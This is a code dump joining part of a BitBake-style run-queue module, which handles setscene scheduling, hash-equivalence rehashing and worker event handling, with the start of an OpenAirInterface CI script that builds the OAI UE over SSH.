next.difference_update(total)
# Now iterate those tasks in dependency order to regenerate their taskhash/unihash
next = set()
for p in total:
if len(self.rqdata.runtaskentries[p].depends) == 0:
next.add(p)
elif self.rqdata.runtaskentries[p].depends.isdisjoint(total):
next.add(p)
# When an item doesn't have dependencies in total, we can process it. Drop items from total when handled
while next:
current = next.copy()
next = set()
for tid in current:
if len(self.rqdata.runtaskentries[p].depends) and not self.rqdata.runtaskentries[tid].depends.isdisjoint(total):
continue
orighash = self.rqdata.runtaskentries[tid].hash
dc = bb.parse.siggen.get_data_caches(self.rqdata.dataCaches, mc_from_tid(tid))
newhash = bb.parse.siggen.get_taskhash(tid, self.rqdata.runtaskentries[tid].depends, dc)
origuni = self.rqdata.runtaskentries[tid].unihash
newuni = bb.parse.siggen.get_unihash(tid)
# FIXME, need to check it can come from sstate at all for determinism?
remapped = False
if newuni == origuni:
# Nothing to do, we match, skip code below
remapped = True
elif tid in self.scenequeue_covered or tid in self.sq_live:
# Already ran this setscene task or it running. Report the new taskhash
bb.parse.siggen.report_unihash_equiv(tid, newhash, origuni, newuni, self.rqdata.dataCaches)
hashequiv_logger.verbose("Already covered setscene for %s so ignoring rehash (remap)" % (tid))
remapped = True
if not remapped:
#logger.debug(1, "Task %s hash changes: %s->%s %s->%s" % (tid, orighash, newhash, origuni, newuni))
self.rqdata.runtaskentries[tid].hash = newhash
self.rqdata.runtaskentries[tid].unihash = newuni
changed.add(tid)
next |= self.rqdata.runtaskentries[tid].revdeps
total.remove(tid)
next.intersection_update(total)
if changed:
for mc in self.rq.worker:
self.rq.worker[mc].process.stdin.write(b"<newtaskhashes>" + pickle.dumps(bb.parse.siggen.get_taskhashes()) + b"</newtaskhashes>")
for mc in self.rq.fakeworker:
self.rq.fakeworker[mc].process.stdin.write(b"<newtaskhashes>" + pickle.dumps(bb.parse.siggen.get_taskhashes()) + b"</newtaskhashes>")
hashequiv_logger.debug(1, pprint.pformat("Tasks changed:\n%s" % (changed)))
for tid in changed:
if tid not in self.rqdata.runq_setscene_tids:
continue
if tid not in self.pending_migrations:
self.pending_migrations.add(tid)
update_tasks = []
for tid in self.pending_migrations.copy():
if tid in self.runq_running or tid in self.sq_live:
# Too late, task already running, not much we can do now
self.pending_migrations.remove(tid)
continue
valid = True
# Check no tasks this covers are running
for dep in self.sqdata.sq_covered_tasks[tid]:
if dep in self.runq_running and dep not in self.runq_complete:
hashequiv_logger.debug(2, "Task %s is running which blocks setscene for %s from running" % (dep, tid))
valid = False
break
if not valid:
continue
self.pending_migrations.remove(tid)
changed = True
if tid in self.tasks_scenequeue_done:
self.tasks_scenequeue_done.remove(tid)
for dep in self.sqdata.sq_covered_tasks[tid]:
if dep in self.runq_complete and dep not in self.runq_tasksrun:
bb.error("Task %s marked as completed but now needing to rerun? Aborting build." % dep)
self.failed_tids.append(tid)
self.rq.state = runQueueCleanUp
return
if dep not in self.runq_complete:
if dep in self.tasks_scenequeue_done and dep not in self.sqdata.unskippable:
self.tasks_scenequeue_done.remove(dep)
if tid in self.sq_buildable:
self.sq_buildable.remove(tid)
if tid in self.sq_running:
self.sq_running.remove(tid)
harddepfail = False
for t in self.sqdata.sq_harddeps:
if tid in self.sqdata.sq_harddeps[t] and t in self.scenequeue_notcovered:
harddepfail = True
break
if not harddepfail and self.sqdata.sq_revdeps[tid].issubset(self.scenequeue_covered | self.scenequeue_notcovered):
if tid not in self.sq_buildable:
self.sq_buildable.add(tid)
if len(self.sqdata.sq_revdeps[tid]) == 0:
self.sq_buildable.add(tid)
if tid in self.sqdata.outrightfail:
self.sqdata.outrightfail.remove(tid)
if tid in self.scenequeue_notcovered:
self.scenequeue_notcovered.remove(tid)
if tid in self.scenequeue_covered:
self.scenequeue_covered.remove(tid)
if tid in self.scenequeue_notneeded:
self.scenequeue_notneeded.remove(tid)
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
self.sqdata.stamps[tid] = bb.build.stampfile(taskname + "_setscene", self.rqdata.dataCaches[mc], taskfn, noextra=True)
if tid in self.stampcache:
del self.stampcache[tid]
if tid in self.build_stamps:
del self.build_stamps[tid]
update_tasks.append((tid, harddepfail, tid in self.sqdata.valid))
if update_tasks:
self.sqdone = False
update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
for (tid, harddepfail, origvalid) in update_tasks:
if tid in self.sqdata.valid and not origvalid:
hashequiv_logger.verbose("Setscene task %s became valid" % tid)
if harddepfail:
self.sq_task_failoutright(tid)
if changed:
self.holdoff_need_update = True
def scenequeue_updatecounters(self, task, fail=False):
for dep in sorted(self.sqdata.sq_deps[task]):
if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
self.sq_task_failoutright(dep)
continue
if self.sqdata.sq_revdeps[dep].issubset(self.scenequeue_covered | self.scenequeue_notcovered):
if dep not in self.sq_buildable:
self.sq_buildable.add(dep)
next = set([task])
while next:
new = set()
for t in sorted(next):
self.tasks_scenequeue_done.add(t)
# Look down the dependency chain for non-setscene things which this task depends on
# and mark as 'done'
for dep in self.rqdata.runtaskentries[t].depends:
if dep in self.rqdata.runq_setscene_tids or dep in self.tasks_scenequeue_done:
continue
if self.rqdata.runtaskentries[dep].revdeps.issubset(self.tasks_scenequeue_done):
new.add(dep)
next = new
self.holdoff_need_update = True
def sq_task_completeoutright(self, task):
"""
Mark a task as completed
Look at the reverse dependencies and mark any task with
completed dependencies as buildable
"""
logger.debug(1, 'Found task %s which could be accelerated', task)
self.scenequeue_covered.add(task)
self.scenequeue_updatecounters(task)
def sq_check_taskfail(self, task):
if self.rqdata.setscenewhitelist is not None:
realtask = task.split('_setscene')[0]
(mc, fn, taskname, taskfn) = split_tid_mcfn(realtask)
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
if not check_setscene_enforce_whitelist(pn, taskname, self.rqdata.setscenewhitelist):
logger.error('Task %s.%s failed' % (pn, taskname + "_setscene"))
self.rq.state = runQueueCleanUp
def sq_task_complete(self, task):
self.sq_stats.taskCompleted()
bb.event.fire(sceneQueueTaskCompleted(task, self.sq_stats, self.rq), self.cfgData)
self.sq_task_completeoutright(task)
def sq_task_fail(self, task, result):
self.sq_stats.taskFailed()
bb.event.fire(sceneQueueTaskFailed(task, self.sq_stats, result, self), self.cfgData)
self.scenequeue_notcovered.add(task)
self.scenequeue_updatecounters(task, True)
self.sq_check_taskfail(task)
def sq_task_failoutright(self, task):
self.sq_running.add(task)
self.sq_buildable.add(task)
self.sq_stats.taskSkipped()
self.sq_stats.taskCompleted()
self.scenequeue_notcovered.add(task)
self.scenequeue_updatecounters(task, True)
def sq_task_skip(self, task):
self.sq_running.add(task)
self.sq_buildable.add(task)
self.sq_task_completeoutright(task)
self.sq_stats.taskSkipped()
self.sq_stats.taskCompleted()
def sq_build_taskdepdata(self, task):
def getsetscenedeps(tid):
deps = set()
(mc, fn, taskname, _) = split_tid_mcfn(tid)
realtid = tid + "_setscene"
idepends = self.rqdata.taskData[mc].taskentries[realtid].idepends
for (depname, idependtask) in idepends:
if depname not in self.rqdata.taskData[mc].build_targets:
continue
depfn = self.rqdata.taskData[mc].build_targets[depname][0]
if depfn is None:
continue
deptid = depfn + ":" + idependtask.replace("_setscene", "")
deps.add(deptid)
return deps
taskdepdata = {}
next = getsetscenedeps(task)
next.add(task)
while next:
additional = []
for revdep in next:
(mc, fn, taskname, taskfn) = split_tid_mcfn(revdep)
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
deps = getsetscenedeps(revdep)
provides = self.rqdata.dataCaches[mc].fn_provides[taskfn]
taskhash = self.rqdata.runtaskentries[revdep].hash
unihash = self.rqdata.runtaskentries[revdep].unihash
taskdepdata[revdep] = [pn, taskname, fn, deps, provides, taskhash, unihash]
for revdep2 in deps:
if revdep2 not in taskdepdata:
additional.append(revdep2)
next = additional
#bb.note("Task %s: " % task + str(taskdepdata).replace("], ", "],\n"))
return taskdepdata
def check_setscenewhitelist(self, tid):
# Check task that is going to run against the whitelist
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
# Ignore covered tasks
if tid in self.tasks_covered:
return False
# Ignore stamped tasks
if self.rq.check_stamp_task(tid, taskname, cache=self.stampcache):
return False
# Ignore noexec tasks
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
if 'noexec' in taskdep and taskname in taskdep['noexec']:
return False
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
if not check_setscene_enforce_whitelist(pn, taskname, self.rqdata.setscenewhitelist):
if tid in self.rqdata.runq_setscene_tids:
msg = 'Task %s.%s attempted to execute unexpectedly and should have been setscened' % (pn, taskname)
else:
msg = 'Task %s.%s attempted to execute unexpectedly' % (pn, taskname)
for t in self.scenequeue_notcovered:
msg = msg + "\nTask %s, unihash %s, taskhash %s" % (t, self.rqdata.runtaskentries[t].unihash, self.rqdata.runtaskentries[t].hash)
logger.error(msg + '\nThis is usually due to missing setscene tasks. Those missing in this build were: %s' % pprint.pformat(self.scenequeue_notcovered))
return True
return False
class SQData(object):
def __init__(self):
# SceneQueue dependencies
self.sq_deps = {}
# SceneQueue reverse dependencies
self.sq_revdeps = {}
# Injected inter-setscene task dependencies
self.sq_harddeps = {}
# Cache of stamp files so duplicates can't run in parallel
self.stamps = {}
# Setscene tasks directly depended upon by the build
self.unskippable = set()
# List of setscene tasks which aren't present
self.outrightfail = set()
# A list of normal tasks a setscene task covers
self.sq_covered_tasks = {}
def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
sq_revdeps = {}
sq_revdeps_squash = {}
sq_collated_deps = {}
# We need to construct a dependency graph for the setscene functions. Intermediate
# dependencies between the setscene tasks only complicate the code. This code
# therefore aims to collapse the huge runqueue dependency tree into a smaller one
# only containing the setscene functions.
rqdata.init_progress_reporter.next_stage()
# First process the chains up to the first setscene task.
endpoints = {}
for tid in rqdata.runtaskentries:
sq_revdeps[tid] = copy.copy(rqdata.runtaskentries[tid].revdeps)
sq_revdeps_squash[tid] = set()
if (len(sq_revdeps[tid]) == 0) and tid not in rqdata.runq_setscene_tids:
#bb.warn("Added endpoint %s" % (tid))
endpoints[tid] = set()
rqdata.init_progress_reporter.next_stage()
# Secondly process the chains between setscene tasks.
for tid in rqdata.runq_setscene_tids:
sq_collated_deps[tid] = set()
#bb.warn("Added endpoint 2 %s" % (tid))
for dep in rqdata.runtaskentries[tid].depends:
if tid in sq_revdeps[dep]:
sq_revdeps[dep].remove(tid)
if dep not in endpoints:
endpoints[dep] = set()
#bb.warn(" Added endpoint 3 %s" % (dep))
endpoints[dep].add(tid)
rqdata.init_progress_reporter.next_stage()
def process_endpoints(endpoints):
newendpoints = {}
for point, task in endpoints.items():
tasks = set()
if task:
tasks |= task
if sq_revdeps_squash[point]:
tasks |= sq_revdeps_squash[point]
if point not in rqdata.runq_setscene_tids:
for t in tasks:
sq_collated_deps[t].add(point)
sq_revdeps_squash[point] = set()
if point in rqdata.runq_setscene_tids:
sq_revdeps_squash[point] = tasks
tasks = set()
continue
for dep in rqdata.runtaskentries[point].depends:
if point in sq_revdeps[dep]:
sq_revdeps[dep].remove(point)
if tasks:
sq_revdeps_squash[dep] |= tasks
if len(sq_revdeps[dep]) == 0 and dep not in rqdata.runq_setscene_tids:
newendpoints[dep] = task
if len(newendpoints) != 0:
process_endpoints(newendpoints)
process_endpoints(endpoints)
rqdata.init_progress_reporter.next_stage()
# Build a list of tasks which are "unskippable"
# These are direct endpoints referenced by the build upto and including setscene tasks
# Take the build endpoints (no revdeps) and find the sstate tasks they depend upon
new = True
for tid in rqdata.runtaskentries:
if len(rqdata.runtaskentries[tid].revdeps) == 0:
sqdata.unskippable.add(tid)
sqdata.unskippable |= sqrq.cantskip
while new:
new = False
orig = sqdata.unskippable.copy()
for tid in sorted(orig, reverse=True):
if tid in rqdata.runq_setscene_tids:
continue
if len(rqdata.runtaskentries[tid].depends) == 0:
# These are tasks which have no setscene tasks in their chain, need to mark as directly buildable
sqrq.setbuildable(tid)
sqdata.unskippable |= rqdata.runtaskentries[tid].depends
if sqdata.unskippable != orig:
new = True
sqrq.tasks_scenequeue_done |= sqdata.unskippable.difference(rqdata.runq_setscene_tids)
rqdata.init_progress_reporter.next_stage(len(rqdata.runtaskentries))
# Sanity check all dependencies could be changed to setscene task references
for taskcounter, tid in enumerate(rqdata.runtaskentries):
if tid in rqdata.runq_setscene_tids:
pass
elif len(sq_revdeps_squash[tid]) != 0:
bb.msg.fatal("RunQueue", "Something went badly wrong during scenequeue generation, aborting. Please report this problem.")
else:
del sq_revdeps_squash[tid]
rqdata.init_progress_reporter.update(taskcounter)
rqdata.init_progress_reporter.next_stage()
# Resolve setscene inter-task dependencies
# e.g. do_sometask_setscene[depends] = "targetname:do_someothertask_setscene"
# Note that anything explicitly depended upon will have its reverse dependencies removed to avoid circular dependencies
for tid in rqdata.runq_setscene_tids:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
realtid = tid + "_setscene"
idepends = rqdata.taskData[mc].taskentries[realtid].idepends
sqdata.stamps[tid] = bb.build.stampfile(taskname + "_setscene", rqdata.dataCaches[mc], taskfn, noextra=True)
for (depname, idependtask) in idepends:
if depname not in rqdata.taskData[mc].build_targets:
continue
depfn = rqdata.taskData[mc].build_targets[depname][0]
if depfn is None:
continue
deptid = depfn + ":" + idependtask.replace("_setscene", "")
if deptid not in rqdata.runtaskentries:
bb.msg.fatal("RunQueue", "Task %s depends upon non-existent task %s:%s" % (realtid, depfn, idependtask))
if not deptid in sqdata.sq_harddeps:
sqdata.sq_harddeps[deptid] = set()
sqdata.sq_harddeps[deptid].add(tid)
sq_revdeps_squash[tid].add(deptid)
# Have to zero this to avoid circular dependencies
sq_revdeps_squash[deptid] = set()
rqdata.init_progress_reporter.next_stage()
for task in sqdata.sq_harddeps:
for dep in sqdata.sq_harddeps[task]:
sq_revdeps_squash[dep].add(task)
rqdata.init_progress_reporter.next_stage()
#for tid in sq_revdeps_squash:
# data = ""
# for dep in sq_revdeps_squash[tid]:
# data = data + "\n %s" % dep
# bb.warn("Task %s_setscene: is %s " % (tid, data))
sqdata.sq_revdeps = sq_revdeps_squash
sqdata.sq_covered_tasks = sq_collated_deps
# Build reverse version of revdeps to populate deps structure
for tid in sqdata.sq_revdeps:
sqdata.sq_deps[tid] = set()
for tid in sqdata.sq_revdeps:
for dep in sqdata.sq_revdeps[tid]:
sqdata.sq_deps[dep].add(tid)
rqdata.init_progress_reporter.next_stage()
sqdata.multiconfigs = set()
for tid in sqdata.sq_revdeps:
sqdata.multiconfigs.add(mc_from_tid(tid))
if len(sqdata.sq_revdeps[tid]) == 0:
sqrq.sq_buildable.add(tid)
rqdata.init_progress_reporter.finish()
sqdata.noexec = set()
sqdata.stamppresent = set()
sqdata.valid = set()
update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
tocheck = set()
for tid in sorted(tids):
if tid in sqdata.stamppresent:
sqdata.stamppresent.remove(tid)
if tid in sqdata.valid:
sqdata.valid.remove(tid)
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
taskdep = rqdata.dataCaches[mc].task_deps[taskfn]
if 'noexec' in taskdep and taskname in taskdep['noexec']:
sqdata.noexec.add(tid)
sqrq.sq_task_skip(tid)
bb.build.make_stamp(taskname + "_setscene", rqdata.dataCaches[mc], taskfn)
continue
if rq.check_stamp_task(tid, taskname + "_setscene", cache=stampcache):
logger.debug(2, 'Setscene stamp current for task %s', tid)
sqdata.stamppresent.add(tid)
sqrq.sq_task_skip(tid)
continue
if rq.check_stamp_task(tid, taskname, recurse = True, cache=stampcache):
logger.debug(2, 'Normal stamp current for task %s', tid)
sqdata.stamppresent.add(tid)
sqrq.sq_task_skip(tid)
continue
tocheck.add(tid)
sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)
sqdata.hashes = {}
for mc in sorted(sqdata.multiconfigs):
for tid in sorted(sqdata.sq_revdeps):
if mc_from_tid(tid) != mc:
continue
if tid in sqdata.stamppresent:
continue
if tid in sqdata.valid:
continue
if tid in sqdata.noexec:
continue
if tid in sqrq.scenequeue_notcovered:
continue
sqdata.outrightfail.add(tid)
h = pending_hash_index(tid, rqdata)
if h not in sqdata.hashes:
sqdata.hashes[h] = tid
else:
sqrq.sq_deferred[tid] = sqdata.hashes[h]
bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
class TaskFailure(Exception):
"""
Exception raised when a task in a runqueue fails
"""
def __init__(self, x):
self.args = x
class runQueueExitWait(bb.event.Event):
"""
Event when waiting for task processes to exit
"""
def __init__(self, remain):
self.remain = remain
self.message = "Waiting for %s active tasks to finish" % remain
bb.event.Event.__init__(self)
class runQueueEvent(bb.event.Event):
"""
Base runQueue event class
"""
def __init__(self, task, stats, rq):
self.taskid = task
self.taskstring = task
self.taskname = taskname_from_tid(task)
self.taskfile = fn_from_tid(task)
self.taskhash = rq.rqdata.get_task_hash(task)
self.stats = stats.copy()
bb.event.Event.__init__(self)
class sceneQueueEvent(runQueueEvent):
"""
Base sceneQueue event class
"""
def __init__(self, task, stats, rq, noexec=False):
runQueueEvent.__init__(self, task, stats, rq)
self.taskstring = task + "_setscene"
self.taskname = taskname_from_tid(task) + "_setscene"
self.taskfile = fn_from_tid(task)
self.taskhash = rq.rqdata.get_task_hash(task)
class runQueueTaskStarted(runQueueEvent):
"""
Event notifying a task was started
"""
def __init__(self, task, stats, rq, noexec=False):
runQueueEvent.__init__(self, task, stats, rq)
self.noexec = noexec
class sceneQueueTaskStarted(sceneQueueEvent):
"""
Event notifying a setscene task was started
"""
def __init__(self, task, stats, rq, noexec=False):
sceneQueueEvent.__init__(self, task, stats, rq)
self.noexec = noexec
class runQueueTaskFailed(runQueueEvent):
"""
Event notifying a task failed
"""
def __init__(self, task, stats, exitcode, rq):
runQueueEvent.__init__(self, task, stats, rq)
self.exitcode = exitcode
def __str__(self):
return "Task (%s) failed with exit code '%s'" % (self.taskstring, self.exitcode)
class sceneQueueTaskFailed(sceneQueueEvent):
"""
Event notifying a setscene task failed
"""
def __init__(self, task, stats, exitcode, rq):
sceneQueueEvent.__init__(self, task, stats, rq)
self.exitcode = exitcode
def __str__(self):
return "Setscene task (%s) failed with exit code '%s' - real task will be run instead" % (self.taskstring, self.exitcode)
class sceneQueueComplete(sceneQueueEvent):
"""
Event when all the sceneQueue tasks are complete
"""
def __init__(self, stats, rq):
self.stats = stats.copy()
bb.event.Event.__init__(self)
class runQueueTaskCompleted(runQueueEvent):
"""
Event notifying a task completed
"""
class sceneQueueTaskCompleted(sceneQueueEvent):
"""
Event notifying a setscene task completed
"""
class runQueueTaskSkipped(runQueueEvent):
"""
Event notifying a task was skipped
"""
def __init__(self, task, stats, rq, reason):
runQueueEvent.__init__(self, task, stats, rq)
self.reason = reason
class taskUniHashUpdate(bb.event.Event):
"""
Base runQueue event class
"""
def __init__(self, task, unihash):
self.taskid = task
self.unihash = unihash
bb.event.Event.__init__(self)
class runQueuePipe():
"""
Abstraction for a pipe between a worker thread and the server
"""
def __init__(self, pipein, pipeout, d, rq, rqexec):
self.input = pipein
if pipeout:
pipeout.close()
bb.utils.nonblockingfd(self.input)
self.queue = b""
self.d = d
self.rq = rq
self.rqexec = rqexec
def setrunqueueexec(self, rqexec):
self.rqexec = rqexec
def read(self):
for workers, name in [(self.rq.worker, "Worker"), (self.rq.fakeworker, "Fakeroot")]:
for worker in workers.values():
worker.process.poll()
if worker.process.returncode is not None and not self.rq.teardown:
bb.error("%s process (%s) exited unexpectedly (%s), shutting down..." % (name, worker.process.pid, str(worker.process.returncode)))
self.rq.finish_runqueue(True)
start = len(self.queue)
try:
self.queue = self.queue + (self.input.read(102400) or b"")
except (OSError, IOError) as e:
if e.errno != errno.EAGAIN:
raise
end = len(self.queue)
found = True
while found and len(self.queue):
found = False
index = self.queue.find(b"</event>")
while index != -1 and self.queue.startswith(b"<event>"):
try:
event = pickle.loads(self.queue[7:index])
except (ValueError, pickle.UnpicklingError, AttributeError, IndexError) as e:
if isinstance(e, pickle.UnpicklingError) and "truncated" in str(e):
# The pickled data could contain "</event>" so search for the next occurance
# unpickling again, this should be the only way an unpickle error could occur
index = self.queue.find(b"</event>", index + 1)
continue
bb.msg.fatal("RunQueue", "failed load pickle '%s': '%s'" % (e, self.queue[7:index]))
bb.event.fire_from_worker(event, self.d)
if isinstance(event, taskUniHashUpdate):
self.rqexec.updated_taskhash_queue.append((event.taskid, event.unihash))
found = True
self.queue = self.queue[index+8:]
index = self.queue.find(b"</event>")
index = self.queue.find(b"</exitcode>")
while index != -1 and self.queue.startswith(b"<exitcode>"):
try:
task, status = pickle.loads(self.queue[10:index])
except (ValueError, pickle.UnpicklingError, AttributeError, IndexError) as e:
bb.msg.fatal("RunQueue", "failed load pickle '%s': '%s'" % (e, self.queue[10:index]))
self.rqexec.runqueue_process_waitpid(task, status)
found = True
self.queue = self.queue[index+11:]
index = self.queue.find(b"</exitcode>")
return (end > start)
def close(self):
while self.read():
continue
if len(self.queue) > 0:
print("Warning, worker left partial message: %s" % self.queue)
self.input.close()
def get_setscene_enforce_whitelist(d):
if d.getVar('BB_SETSCENE_ENFORCE') != '1':
return None
whitelist = (d.getVar("BB_SETSCENE_ENFORCE_WHITELIST") or "").split()
outlist = []
for item in whitelist[:]:
if item.startswith('%:'):
for target in sys.argv[1:]:
if not target.startswith('-'):
outlist.append(target.split(':')[0] + ':' + item.split(':')[1])
else:
outlist.append(item)
return outlist
def check_setscene_enforce_whitelist(pn, taskname, whitelist):
import fnmatch
if whitelist is not None:
item = '%s:%s' % (pn, taskname)
for whitelist_item in whitelist:
if fnmatch.fnmatch(item, whitelist_item):
return True
return False
return True
|
main.py | #/*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Import Components
#-----------------------------------------------------------
import helpreadme as HELP
import constants as CONST
import cls_physim #class PhySim for physical simulators build and test
import cls_cots_ue #class CotsUe for Airplane mode control
import sshconnection
import epc
import ran
import html
#-----------------------------------------------------------
# Import Libs
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# OaiCiTest Class Definition
#-----------------------------------------------------------
class OaiCiTest():
def __init__(self):
self.ranRepository = ''
self.ranBranch = ''
self.ranCommitID = ''
self.ranAllowMerge = False
self.ranTargetBranch = ''
self.FailReportCnt = 0
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.ADBCentralized = True
self.testCase_id = ''
self.testXMLfiles = []
self.desc = ''
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.iperf_options = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.UEDevicesStatus = []
self.UEDevicesRemoteServer = []
self.UEDevicesRemoteUser = []
self.UEDevicesOffCmd = []
self.UEDevicesOnCmd = []
self.UEDevicesRebootCmd = []
self.CatMDevices = []
self.UEIPAddresses = []
self.idle_sleep_time = 0
self.x2_ho_options = 'network'
self.x2NbENBs = 0
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.repeatCounts = []
self.finalStatus = False
self.UEIPAddress = ''
self.UEUserName = ''
self.UEPassword = ''
self.UE_instance = 0
self.UESourceCodePath = ''
self.UELogFile = ''
self.Build_OAI_UE_args = ''
self.Initialize_OAI_UE_args = ''
self.clean_repository = True
self.air_interface=''
self.expectedNbOfConnectedUEs = 0
def BuildOAIUE(self):
if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
result = re.search('--nrUE', self.Build_OAI_UE_args)
if result is not None:
self.air_interface='nr-uesoftmodem'
ue_prefix = 'NR '
else:
self.air_interface='lte-uesoftmodem'
ue_prefix = ''
result = re.search('([a-zA-Z0-9\:\-\.\/])+\.git', self.ranRepository)
if result is not None:
full_ran_repo_name = self.ranRepository
else:
full_ran_repo_name = self.ranRepository + '.git'
SSH.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
SSH.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + full_ran_repo_name + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# here add a check if git clone or git fetch went smoothly
SSH.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
SSH.command('git config user.name "OAI Jenkins"', '\$', 5)
if self.clean_repository:
SSH.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', SSH.getBefore())
if result is not None:
mismatch = False
SSH.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, SSH.getBefore())
if result is None:
mismatch = True
SSH.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranAllowMerge:
result = re.search('YES', SSH.getBefore())
if result is None:
mismatch = True
SSH.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', SSH.getBefore())
else:
result = re.search(self.ranTargetBranch, SSH.getBefore())
if result is None:
mismatch = True
else:
result = re.search('NO', SSH.getBefore())
if result is None:
mismatch = True
if not mismatch:
SSH.close()
HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK)
return
SSH.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
SSH.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if self.ranAllowMerge:
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
SSH.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
SSH.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
SSH.command('source oaienv', '\$', 5)
SSH.command('cd cmake_targets', '\$', 5)
SSH.command('mkdir -p log', '\$', 5)
SSH.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
SSH.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 900)
SSH.command('ls ran_build/build', '\$', 3)
SSH.command('ls ran_build/build', '\$', 3)
buildStatus = True
result = re.search(self.air_interface, SSH.getBefore())
if result is None:
buildStatus = False
SSH.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
SSH.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
SSH.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
if buildStatus:
# Generating a BUILD INFO file
SSH.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
SSH.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranAllowMerge:
SSH.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
SSH.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
SSH.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
SSH.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
SSH.close()
HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK, 'OAI UE')
else:
SSH.close()
logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
HTML.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', CONST.ALL_PROCESSES_OK, 'OAI UE')
HTML.CreateHtmlTabFooter(False)
sys.exit(1)
def CheckFlexranCtrlInstallation(self):
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
return
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
